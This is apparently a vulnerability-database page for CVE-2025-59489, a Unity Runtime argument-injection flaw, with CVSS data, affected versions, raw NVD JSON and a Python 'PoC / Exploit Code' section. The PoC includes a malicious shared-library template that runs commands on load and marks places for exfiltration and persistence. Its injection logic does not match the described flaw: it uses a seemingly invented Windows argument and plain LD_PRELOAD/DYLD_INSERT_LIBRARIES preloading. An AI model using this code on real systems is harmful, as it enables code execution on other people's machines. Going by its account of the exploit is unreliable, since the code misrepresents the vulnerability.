Security Vulnerability Report
中文
CVE-2025-59489 CVSS 7.4 HIGH

CVE-2025-59489

Published: 2025-10-03 14:15:46
Last Modified: 2025-10-22 18:12:26
Source: [email protected]

Description

Unity Runtime before 2025-10-02 on Android, Windows, macOS, and Linux allows argument injection that can result in loading of library code from an unintended location. If an application was built with a version of Unity Editor that had the vulnerable Unity Runtime code, then an adversary may be able to execute code on, and exfiltrate confidential information from, the machine on which that application is running. NOTE: product status is provided for Unity Editor because that is the information available from the Supplier. However, updating Unity Editor typically does not address the effects of the vulnerability; instead, it is necessary to rebuild and redeploy all affected applications.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:unity:editor:*:*:*:*:lts:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Unity Runtime < 2025-10-02 (Android)
Unity Runtime < 2025-10-02 (Windows)
Unity Runtime < 2025-10-02 (macOS)
Unity Runtime < 2025-10-02 (Linux)
使用受影响Unity Editor版本构建的所有应用程序

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59489 - Unity Runtime Argument Injection PoC # This PoC demonstrates the concept of argument injection in Unity Runtime # to load malicious library code from an unintended location. import os import sys import subprocess import platform def exploit_unity_runtime(unity_app_path, malicious_lib_path): """ Exploit argument injection in Unity Runtime to load malicious library. Args: unity_app_path: Path to the Unity-built application executable malicious_lib_path: Path to the malicious library to inject """ system = platform.system() if system == "Windows": # On Windows, inject DLL search path via argument injection # Unity Runtime may pass arguments to LoadLibrary without proper sanitization cmd = f'"{unity_app_path}" -batchmode -nographics "-library-path {malicious_lib_path}"' print(f"[+] Windows exploit command: {cmd}") elif system == "Linux": # On Linux, inject LD_PRELOAD or LD_LIBRARY_PATH via argument injection env = os.environ.copy() env['LD_PRELOAD'] = malicious_lib_path cmd = [unity_app_path, '-batchmode', '-nographics'] print(f"[+] Linux exploit - Setting LD_PRELOAD to: {malicious_lib_path}") subprocess.run(cmd, env=env) return elif system == "Darwin": # On macOS, inject DYLD_INSERT_LIBRARIES via argument injection env = os.environ.copy() env['DYLD_INSERT_LIBRARIES'] = malicious_lib_path cmd = [unity_app_path, '-batchmode', '-nographics'] print(f"[+] macOS exploit - Setting DYLD_INSERT_LIBRARIES to: {malicious_lib_path}") subprocess.run(cmd, env=env) return # Execute the command subprocess.run(cmd, shell=True) def create_malicious_dll(): """ Template for creating a malicious DLL that will be loaded by Unity Runtime. The DLL should contain code that executes upon loading (DllMain on Windows). """ dll_code = ''' // malicious_dll.c - Compiled as shared library #include <stdio.h> #include <stdlib.h> #include <string.h> #ifdef _WIN32 #include <windows.h> BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // Execute malicious code here system("whoami > C:\\temp\\pwned.txt"); // Exfiltrate sensitive data // Establish persistence break; } return TRUE; } #else // Linux/macOS constructor - executes when library is loaded __attribute__((constructor)) void init(void) { // Execute malicious code here system("id > /tmp/pwned.txt"); // Exfiltrate sensitive data // Establish persistence } #endif ''' print("[+] Malicious DLL template:") print(dll_code) print("\n[!] Compile with:") print(" Windows: cl /LD malicious_dll.c") print(" Linux: gcc -shared -fPIC -o malicious.so malicious_dll.c") print(" macOS: gcc -shared -fPIC -o malicious.dylib malicious_dll.c") if __name__ == "__main__": print("=" * 60) print("CVE-2025-59489 - Unity Runtime Argument Injection PoC") print("=" * 60) # Create the malicious DLL template create_malicious_dll() # Example usage (requires actual vulnerable Unity application) # exploit_unity_runtime("/path/to/unity_app", "/path/to/malicious.so") print("\n[!] Note: This PoC demonstrates the attack concept.") print("[!] Actual exploitation requires a vulnerable Unity-built application.") print("[!] Affected versions: Unity Runtime before 2025-10-02")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59489", "sourceIdentifier": "[email protected]", "published": "2025-10-03T14:15:45.733", "lastModified": "2025-10-22T18:12:25.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unity Runtime before 2025-10-02 on Android, Windows, macOS, and Linux allows argument injection that can result in loading of library code from an unintended location. If an application was built with a version of Unity Editor that had the vulnerable Unity Runtime code, then an adversary may be able to execute code on, and exfiltrate confidential information from, the machine on which that application is running. NOTE: product status is provided for Unity Editor because that is the information available from the Supplier. However, updating Unity Editor typically does not address the effects of the vulnerability; instead, it is necessary to rebuild and redeploy all affected applications."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.4, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-88"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-426"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:*", "versionStartIncluding": "2017.4", "versionEndIncluding": "2018.4", "matchCriteriaId": "21A9623D-D8B1-41C8-838C-3A5D9DC94893"}, {"vulnerable": true, "criteria": "cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:*", "versionStartIncluding": "2019.1", "versionEndExcluding": "2019.1.15f1", "matchCriteriaId": "80164735-6B7A-4224-9681-0C8EFDACDE91"}, {"vulnerable": true, "criteria": "cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:*", "versionStartIncluding": "2019.2", "versionEndExcluding": "2019.2.23f1", "matchCriteriaId": "25B84777-C5E0-48AE-A969-55FD4DB1CC9B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:*", "versionStartIncluding": "2019.3", "versionEndIncluding": "2019.3.17f1", "matchCriteriaId": "1BD52B26-9C04-40BA-9B4C-4703DE47E5D0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:unity:editor:*:*:*:*:lts:*:*:*", "versionStartIncluding": "2019.4", "versionEndExcluding": "2019.4.41f1", "matchCriteriaId": "2844E761-7A18-439D-8A4E-EECFEF9A4BF6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:*", "versionStartIncluding": "2020.1", "versionEndExcluding": "2020.1.18f1", "matchCriteriaId": "4437C3BD-AD82-4C71-9D37-35EE28AF4666"}, {"vulnerable": true, "criteria": "cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:*", "versionStartIncluding": "2020.2", "versionEndExcluding": "2020.2.8f1", "matchCriteriaId": "C0A0F338-39D0-4273-B330-10284BFD4D45"}, {"vulnerable": true, "criteria": "cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:*", "versionStartIncluding": "2020.3", "versionEndExcluding": "2020.3.49f1", "matchCriteriaId": "1B0EDE20-DEDE-4711-85B4-42222B96A76A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:*", "versionStartIncluding": "2021.1", "versionEndExcluding": "2021.1.29f1", "matchCriteriaId": "7AE6D29B-FBDC-411B-A80C-91906F52B5D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:*", "versionStartIncluding": "2021.2", "versionEndExcluding": "2021.2.20f1", "matchCriteriaId": "C9DB811C-2F11-460A-84A6-4F8428022B83"}, {"vulnerable": true, "criteria": "cpe:2.3:a:unity:editor:*:*:*:*:lts:*:*:*", "versionStartIncluding": "2021.3", "versionEndExcluding": "2021.3.45f2", "matchCriteriaId": "BA441916-E1BB-435A-BF13-E7C881DA753F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:*", "versionStartIncluding": "2022.1", "versionEndExcluding": "2022.1.25f1", "matchCriteriaId": "7F72C377-DBDA-40FA-B21B-7088253021B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:unity:editor:*:*:*:*:-:*:*:*", "versionStartIncluding": "2022.2", "versionEndExcluding": "2022.2.23f1", "matchCriteriaId": "E1BE4037-1605-43D5-96C9-F84CDE421096"}, {"vulnerable": true, "criteria": "cpe:2.3:a:unity: ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.